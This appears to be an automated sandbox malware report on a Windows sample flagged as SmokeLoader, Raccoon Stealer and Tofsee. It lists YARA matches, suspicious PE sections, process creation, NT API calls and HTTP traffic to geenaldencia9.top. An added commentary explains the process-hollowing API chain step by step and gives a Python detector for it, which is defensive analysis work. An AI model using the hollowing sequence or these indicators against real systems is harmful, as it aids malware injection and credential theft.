                    Source: svchost.exe, 0000000D.00000003.463665196.000001D408B8B000.00000004.00000001.sdmpString found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mys equals www.youtube.com (Youtube)
                    Source: svchost.exe, 0000000D.00000003.463665196.000001D408B8B000.00000004.00000001.sdmpString found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO", equals www.facebook.com (Facebook)
                    Source: svchost.exe, 0000000D.00000003.463665196.000001D408B8B000.00000004.00000001.sdmpString found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO", equals www.twitter.com (Twitter)
                    Source: svchost.exe, 0000000D.00000003.463665196.000001D408B8B000.00000004.00000001.sdmpString found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO", equals www.youtube.com (Youtube)
                    Source: svchost.exe, 0000000D.00000003.463680555.000001D408B9D000.00000004.00000001.sdmpString found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6
                    Source: unknown | HTTP traffic detected: POST / HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; Accept: */*; Referer: http://geenaldencia9.top/; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko; Content-Length: 354; Host: geenaldencia9.top
                    Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49837 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    Yara detected SmokeLoader
                    Source: Yara match | File source: 20.1.6CB1.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.1.pAWNholT8X.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 20.2.6CB1.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.pAWNholT8X.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000004.00000002.435450242.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000014.00000002.504353493.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                    Source: pAWNholT8X.exe, 00000000.00000002.364361089.000000000064A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                    E-Banking Fraud:

                    Yara detected Raccoon Stealer
                    Source: Yara match | File source: 0000001E.00000002.653738313.000000000114D000.00000002.00020000.sdmp, type: MEMORY

                    Spam, unwanted Advertisements and Ransom Demands:

                    Yara detected Tofsee
                    Source: Yara match | File source: 00000023.00000002.626408703.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000023.00000003.600346866.0000000000630000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000023.00000002.639383457.0000000000610000.00000040.00000001.sdmp, type: MEMORY

                    System Summary:

                    barindex
                    PE file contains section with special charsShow sources
                    Source: 8433.exe.6.drStatic PE information: section name:
                    Source: 8433.exe.6.drStatic PE information: section name:
                    Source: 8433.exe.6.drStatic PE information: section name:
                    Source: 8433.exe.6.drStatic PE information: section name: MSI GF65
                    Source: 8433.exe.6.drStatic PE information: section name: MSI GF65
                    Source: CEB6.exe.6.drStatic PE information: section name:
                    Source: CEB6.exe.6.drStatic PE information: section name:
                    Source: CEB6.exe.6.drStatic PE information: section name:
                    Source: CEB6.exe.6.drStatic PE information: section name: Intel Co
                    Source: CEB6.exe.6.drStatic PE information: section name: Intel Co
                    Source: FE25.exe.6.drStatic PE information: section name: RAM 8GB
                    Source: FE25.exe.6.drStatic PE information: section name: RAM 8GB
                    Source: FE25.exe.6.drStatic PE information: section name: RAM 8GB
                    Source: C:\Users\user\Desktop\pAWNholT8X.exeCode function: 0_2_0040238C
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exeCode function: 16_2_0040238C
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_02B7E210
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_02B7B990
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_02B7EA38
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_02B7EA29
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051B0040
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051CA7D8
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051CDED8
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 17_2_051C83D0
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeCode function: 19_2_05810AC1
                    Source: C:\Users\user\AppData\Local\Temp\8433.exeCode function: 19_2_05810AD0
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeCode function: 22_2_0271ED28
                    Source: pAWNholT8X.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: pAWNholT8X.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: pAWNholT8X.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: pAWNholT8X.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 6CB1.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 6CB1.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 6CB1.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 6CB1.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: E52D.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: E52D.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: E52D.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: FE25.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ecrjwib.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ecrjwib.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ecrjwib.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ecrjwib.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: pAWNholT8X.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                    Source: 00000011.00000002.502575031.0000000003D51000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
                    Source: Process Memory Space: 757C.exe PID: 5560, type: MEMORYSTRMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Code function: 4_2_004019A9 Sleep,NtTerminateProcess,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Code function: 4_2_0040194C Sleep,NtTerminateProcess,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Code function: 4_2_0040196C Sleep,NtTerminateProcess,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Code function: 4_2_00402610 NtClose,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Code function: 4_2_0040163E NtMapViewOfSection,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Code function: 4_2_0040223E NtQuerySystemInformation,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Code function: 4_2_004019CB Sleep,NtTerminateProcess,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Code function: 4_2_004020CC NtQuerySystemInformation,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Code function: 4_2_004019D4 NtTerminateProcess,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Code function: 4_2_00401592 NtAllocateVirtualMemory,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Code function: 4_2_004019B6 Sleep,NtTerminateProcess,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Code function: 4_2_004015BC NtAllocateVirtualMemory,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Code function: 4_1_00402610 NtClose,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Code function: 4_1_0040163E NtMapViewOfSection,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Code function: 4_1_0040223E NtQuerySystemInformation,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Code function: 4_1_004020CC NtQuerySystemInformation,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Code function: 4_1_00401592 NtAllocateVirtualMemory,
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Code function: 4_1_004015BC NtAllocateVirtualMemory,
                    Source: C:\Users\user\AppData\Roaming\ecrjwib | Code function: 15_2_00590110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exe | Code function: 16_2_00730110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Code function: 17_2_051B2C00 NtUnmapViewOfSection,
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Code function: 17_2_051B2CB8 NtAllocateVirtualMemory,
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Code function: 17_2_051B2CB2 NtAllocateVirtualMemory,
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Code function: 17_2_051B2BF8 NtUnmapViewOfSection,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exe | Code function: 20_2_004019A9 Sleep,NtTerminateProcess,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exe | Code function: 20_2_0040194C Sleep,NtTerminateProcess,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exe | Code function: 20_2_0040196C Sleep,NtTerminateProcess,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exe | Code function: 20_2_00402610 NtClose,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exe | Code function: 20_2_0040163E NtMapViewOfSection,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exe | Code function: 20_2_0040223E NtQuerySystemInformation,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exe | Code function: 20_2_004019CB Sleep,NtTerminateProcess,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exe | Code function: 20_2_004020CC NtQuerySystemInformation,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exe | Code function: 20_2_004019D4 NtTerminateProcess,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exe | Code function: 20_2_00401592 NtAllocateVirtualMemory,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exe | Code function: 20_2_004019B6 Sleep,NtTerminateProcess,
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exe | Code function: 20_2_004015BC NtAllocateVirtualMemory,
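The ecrjwib and 6CB1.exe records at 15_2_00590110 and 16_2_00730110 are the textbook process-hollowing (RunPE) chain: spawn a fresh copy of the own image with CreateProcessA, fetch its context with GetThreadContext, NtUnmapViewOfSection the original image out of the child, VirtualAllocEx and NtWriteVirtualMemory/WriteProcessMemory the payload into the hole, point the thread at the new entry with SetThreadContext and ResumeThread it. The detector below is an added example, not part of the Joe Sandbox report: it parses "Code function" records of the form above and matches the six hollowing stages as an ordered subsequence, so the same APIs in the wrong order, or an isolated NtAllocateVirtualMemory like the 757C.exe records, do not count. The trace it runs on is constructed: the two injector records from this report plus benign and decoy entries.

```python
import re
from typing import List, Optional, Tuple

# Stages of the process-hollowing (RunPE) sequence in the order they must occur. Each
# stage names the APIs that satisfy it; unrelated calls between stages are allowed,
# stages out of order are not counted.
HOLLOWING_STAGES = [
    ("spawn target", {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"}),
    ("unmap target image", {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"}),
    ("allocate in target", {"VirtualAllocEx", "NtAllocateVirtualMemory"}),
    ("write payload", {"WriteProcessMemory", "NtWriteVirtualMemory"}),
    ("redirect thread", {"SetThreadContext", "NtSetContextThread"}),
    ("resume thread", {"ResumeThread", "NtResumeThread"}),
]

# Matches the report's "Code function: <pid>_<run>_<addr> Api1,Api2,..." records.
RECORD_RE = re.compile(r"Code function:\s*(?P<fn>\S+)\s+(?P<calls>[A-Za-z0-9_,]+)")


def parse_record(line: str) -> Optional[Tuple[str, List[str]]]:
    """Return (function id, [api, ...]) for one record line, None for anything else."""
    m = RECORD_RE.search(line)
    if not m:
        return None
    return m.group("fn"), [c for c in m.group("calls").split(",") if c]


def match_stages(calls: List[str], stages=HOLLOWING_STAGES) -> List[str]:
    """Ordered-subsequence match: a stage counts only if one of its APIs appears after the
    call that satisfied the previously matched stage. Returns the matched stage names."""
    matched, cursor = [], 0
    for name, apis in stages:
        pos = next((i for i in range(cursor, len(calls)) if calls[i] in apis), None)
        if pos is None:
            continue  # stage absent here; later stages are still searched from cursor
        matched.append(name)
        cursor = pos + 1
    return matched


def detect_hollowing(lines: List[str], min_stages: int = 4) -> List[Tuple[str, List[str]]]:
    """Flag every function whose call sequence covers at least min_stages stages in order."""
    hits = []
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        fn, calls = rec
        stages = match_stages(calls)
        if len(stages) >= min_stages:
            hits.append((fn, stages))
    return hits


# Constructed trace: the two injector records from this report, a benign API resolver,
# a lone allocation, a CreateProcess that only writes a file, and the hollowing APIs in
# reverse order (a naive "contains all of them" check would flag the last one).
SAMPLE_TRACE = [
    r"Source: C:\Users\user\AppData\Roaming\ecrjwib | Code function: 15_2_00590110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,",
    r"Source: C:\Users\user\AppData\Local\Temp\6CB1.exe | Code function: 16_2_00730110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,",
    r"Source: C:\Users\user\Desktop\pAWNholT8X.exe | Code function: 0_2_00405286 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,",
    r"Source: C:\Users\user\AppData\Local\Temp\757C.exe | Code function: 17_2_051B2CB8 NtAllocateVirtualMemory,",
    "Source: constructed | Code function: 99_2_00401000 CreateProcessA,WriteFile,CloseHandle,",
    "Source: constructed | Code function: 99_2_00402000 ResumeThread,SetThreadContext,WriteProcessMemory,VirtualAllocEx,NtUnmapViewOfSection,CreateProcessA,",
]
```

detect_hollowing(SAMPLE_TRACE) reports only 15_2_00590110 and 16_2_00730110, each with all six stages; the reversed decoy matches a single stage because nothing legitimate follows its CreateProcessA. The same ordered-subsequence matcher works unchanged on an API-monitor or ETW call log once the parser is swapped for that log's format.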
                    Source: CEB6.exe.6.dr | Static PE information: Resource name: B7 type: 7-zip archive data, version 0.3
                    Source: pAWNholT8X.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: 6CB1.exe.6.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: E52D.exe.6.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: ecrjwib.6.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: 8433.exe.6.dr | Static PE information: Section: (empty name) ZLIB complexity 0.999352181312
                    Source: 8433.exe.6.dr | Static PE information: Section: .boot ZLIB complexity 0.995906760169
                    Source: CEB6.exe.6.dr | Static PE information: Section: (empty name) ZLIB complexity 0.999008098822
                    Source: CEB6.exe.6.dr | Static PE information: Section: (empty name) ZLIB complexity 0.989093223315
                    Source: CEB6.exe.6.dr | Static PE information: Section: Intel Co ZLIB complexity 1.004296875
                    Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\ecrjwib
                    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@39/9@57/7
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Code function: 0_2_0040104B LoadResource,WaitForMultipleObjects,GlobalGetAtomNameW,SetEvent,FreeUserPhysicalPages,VerLanguageNameW,CreateActCtxW,lstrcpyW,EraseTape,ReadFile,FindFirstVolumeW,FindNextVolumeA,AddConsoleAliasW,InterlockedIncrement,
                    Source: pAWNholT8X.exe | Virustotal: Detection: 36%
                    Source: pAWNholT8X.exe | ReversingLabs: Detection: 40%
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknown | Process created: C:\Users\user\Desktop\pAWNholT8X.exe 'C:\Users\user\Desktop\pAWNholT8X.exe'
                    Source: C:\Users\user\Desktop\pAWNholT8X.exe | Process created: C:\Users\user\Desktop\pAWNholT8X.exe 'C:\Users\user\Desktop\pAWNholT8X.exe'
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p (4 instances)
                    Source: unknown | Process created: C:\Users\user\AppData\Roaming\ecrjwib C:\Users\user\AppData\Roaming\ecrjwib
                    Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\6CB1.exe C:\Users\user\AppData\Local\Temp\6CB1.exe
                    Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\757C.exe C:\Users\user\AppData\Local\Temp\757C.exe
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\8433.exe C:\Users\user\AppData\Local\Temp\8433.exe
                    Source: C:\Users\user\AppData\Local\Temp\6CB1.exe | Process created: C:\Users\user\AppData\Local\Temp\6CB1.exe C:\Users\user\AppData\Local\Temp\6CB1.exe
                    Source: C:\Users\user\AppData\Local\Temp\8433.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\757C.exe | Process created: C:\Users\user\AppData\Local\Temp\757C.exe C:\Users\user\AppData\Local\Temp\757C.exe
                    Source: C:\Users\user\AppData\Roaming\ecrjwib | Process created: C:\Users\user\AppData\Roaming\ecrjwib C:\Users\user\AppData\Roaming\ecrjwib
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\CEB6.exe C:\Users\user\AppData\Local\Temp\CEB6.exe
                    Source: C:\Users\user\AppData\Local\Temp\CEB6.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
